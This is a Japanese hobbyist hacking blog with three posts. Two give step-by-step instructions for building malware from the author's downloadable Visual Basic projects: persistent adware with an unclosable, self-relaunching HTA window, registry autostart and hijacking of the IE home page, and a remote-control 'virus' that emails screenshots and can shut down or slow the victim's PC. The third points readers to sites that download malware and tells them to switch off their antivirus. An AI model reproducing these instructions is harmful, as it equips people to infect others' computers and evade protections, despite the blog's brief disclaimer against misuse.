How to hack・初心者でもわかるハッキングのやり方

コンピューターウイルスメーカーてとらの綴ったブログ

彼を知り己を知れば百戦殆うからず


初心者でも分かり易くサイバー攻撃等を説明します。
過去作品はこちら
当然悪用はダメゼッタイ

アドウェアを作って知ろう 実践編

「アドウェア」みなさん聞いたことありますか
Hao123やSweetPageなんていう具体名を挙げれば聞き覚えのある人、お世話になってしまった人、現在進行中でお世話になっている人などいるかもしれません。

そう

「アドウェア」 とはとにかく自己主張の強いウイルス的な感じのやつですね。
今回はこのアドウェアを実際に

作成

、それによってそのアドウェアの危険性や感染時の対処、どんなことをしているのかを知りましょう 
1作成 
必要ソフト
 ダウンロードしたあおいファイルから あおい.sln をVBで起動します。次に大体30行くらいにある 

a = "http://blog.livedoor.jp/a17646158162488/"
 
 の部分をa="広告するサイトのURL"にします。(そのままではぼくのサイトになります)
これで「あおいのビルド」 をクリックします。これで、あおい>bin>Release>あおい.exeが今回作成されたアドウェアです。この「あおい.exe」をどこか好きな場所に移動させます。
同じフォルダにtest.bmpという名前で壁紙に設定させたい画像ファイルを保存します。
この状態で「あおい.exe」を起動します。

症状
  • 壁紙変更
  • 閉じれないウィンドウ
  • IEのホームページ変更
  • IEお気に入り
  • 自動起動
 
2解説
とても詳しい解説はこちら
今回のプログラムはあくまで、デモ用プログラムのため破壊的活動は行いません。

閉じないウィンドウ
アドウェアとはAdwareつまり広告なので最初に設定したURLをhtaファイルを作成して表示します。
 <!--
function cmd() {
var obj = new ActiveXObject("WScript.Shell");
obj.Run("aoi.hta");}
//--></script></head><body onunload="cmd();">
この部分で 一応htaファイルにも閉じない処理を入れてあります。
しかし、
Windowsではhtaファイルはmshta.exeというプロセスで実行されているので、このプロセスを終了されると「閉じれないウィンドウ」は閉じられてしまいます。なので「あおい.exe」でmshtaを監視します。これでmshta.exeが終了されるとそれを検知してhtaファイルをすぐに起動します。 

その他機能 
今まで自動起動はstartupフォルダにショートカットを格納することで実現していましたが今回はレジストリをいじってIEの操作や自動実行を実装しました。

 質問はコメントへ 

遠隔操作を作って知ろう! 実践編

ハッキングといえば、遠隔操作! 最近はそういうの多いですよね。なので遠隔操作とは一体どのようなことが行われているのか実際に確認して危険を再認識しましょう

まずは必要なものをダウンロードしましょう(長くなるのでVisual Studioは入っている前提で今回は説明します

必要ソフト

VBのインストール方法


hananasagi.zipをダウンロード 

ainezumi > ainezumi.exeをダウンロード
ファイルが全て色の名前なのは、ぼくの通ってた保育園のクラス分けが染色の名前だったのでその影響です。

hananasagi.zipを解凍してください。そのあと、hanaasagi > WindowsApplication2 の順番に開いていきます。そこに、ダウンロードしたainezumi.exeを移動させます。
無題
そして、ainezumi.exeを実行します。すると、
無題
こんな画面が表示されます。ウイルス対策ソフトによっては警告が出る場合もあるそうですが、無視していいです。まず、第一関門!ここで何を打っていくか。

まずは、SMTPサーバー(メール送信用サーバー)の設定
Gmailの人は
SMTPサーバー名 smtp.gmail.com
SMTPアカウント名 Gmail のユーザー名 (「@gmail.com」を含む)
SMTPパスワード  Gmailのパスワード
Yahoo mailの人は
SMTPサーバー名 smtp.mail.yahoo.co.jp
SMTPアカウント名 @yahoo.co.jpより前の部分
SMTPパスワード  Yahoo! JAPAN IDのパスワード

次に、POPサーバー(メール受信用サーバー)の設定
 Gmailの人は
まずこちらで 一番下のPOPを有効にするからその他をクリック
https://support.google.com/mail/troubleshooter/1668960?src=soctw

POPサーバー名  pop.gmail.com
POPアカウント名 Gmail のユーザー名 (「@gmail.com」を含む)
POPパスワード  Gmailのパスワード
Yahoo mailの人は

POPサーバー名  pop.mail.yahoo.co.jp
POPアカウント名 @yahoo.co.jpより前の部分
POPパスワード  Yahoo! JAPAN IDのパスワード

送信元メールアドレスには素直にGmailやYahoo mailのアドレスを打った方が上手くいきやすいです。
起動報告先メールアドレスには携帯電話でもPCでも 起動報告先のメアドを入れてください。
スクリーンショット送信先アドレスには画像が添付されて送られてくるのでデータ量が大きくてもいいPCメールアドレスがお勧めです。
全部の入力が終わりましたら、「設定」ボタンを押してください。 これで必要な情報をソースに書き込みました。
次にhanaasagiフォルダまで戻ってください。そしてそこにあるWindowsApplication2.slnを開いちゃいます。
wefdcs
そして、デバッグからWindowsApplication2のビルドを選択
hanaasagi > WindowsApplication2 > bin > Release
のフォルダーにhanaasagi.exeというファイルが作成されます。これが今回作成した『遠隔操作ウイルス』です!

実際に使ってみよう!
今回作成したウイルスではいったい何が出来るのでしょうか?
・シャットダウン
・スクリーンショットの送信
・ PCを重くする
必ず自分のコンピューターで実行してください(メールを使っているのでこれで犯罪行為を行ってもすぐにばれますよ)

GitHubではこちら
https://github.com/145Tetra/soft1.git



効果はこちら
 

コンピューターウイルスを手に入れる

自分はプログラミングなんて全然出来ない
コンピューターでいたずらをしたいけどいたずらソフトを作れない
そんなあなた

自分で作らなくてもいいんです。

ウイルスサイトに行って引っかかればGET出来ちゃいます!

今回は、安全にウイルスをGET出来るサイトを紹介します。

http://oss.jodi.org/
http://oss.jodi.org/ss.html
http://oss.jodi.org/ss5.html

もし、アンチウイルスソフトがウイルスバスターだった場合

BlogPaint
となる場合がありますが、その場合ウイルスバスターを停止させて黙っといてもらいましょう

このサイトに入ると真っ黒い画面がチカチカします。
しばらくすると
BCAD.zip
My.zip
SCRRR.zip
がダウンロードされます。
BCAD.zip
My.zip
の二つは動作を試しましたが、ウザいですけど被害はほとんどありません。

SCRRR.zip
は中身が#Reset.exeって名前なのでやめときました。

3つともまぁダウンロードだけならzipなのでそれほど危険はないと思われます。
このさいとは、どうやら昔ブラクラを起こしながらダウンロードさせるとそれを実行するという(都市伝説?)があったみたいなのでそのために作られたウイルスサイトですが今は全然こわくありません。

しかし、大抵のウイルスサイトは危険ですので入る時は仮想PC等で下調べをしておきましょう

 
ブログ著者の関連サイト




ブログ著者へ寄付や投げ銭をする
Twitter プロフィール
セキュリティー/VB/C/C++/競プロ/ぜひブログも見てください。 https://t.co/LZcvq03gHp
最新記事
ギャラリー
  • 遠隔操作を作って知ろう! 実践編
  • 遠隔操作を作って知ろう! 実践編
  • 遠隔操作を作って知ろう! 実践編
  • 遠隔操作を作って知ろう! 実践編
  • コンピューターウイルスを手に入れる
  • プログラムの脆弱性を突く 其の2
  • プログラムの脆弱性を突く 其の2
  • プログラムの脆弱性を突く 其の2
  • メモ帳ウイルス 超強力バージョン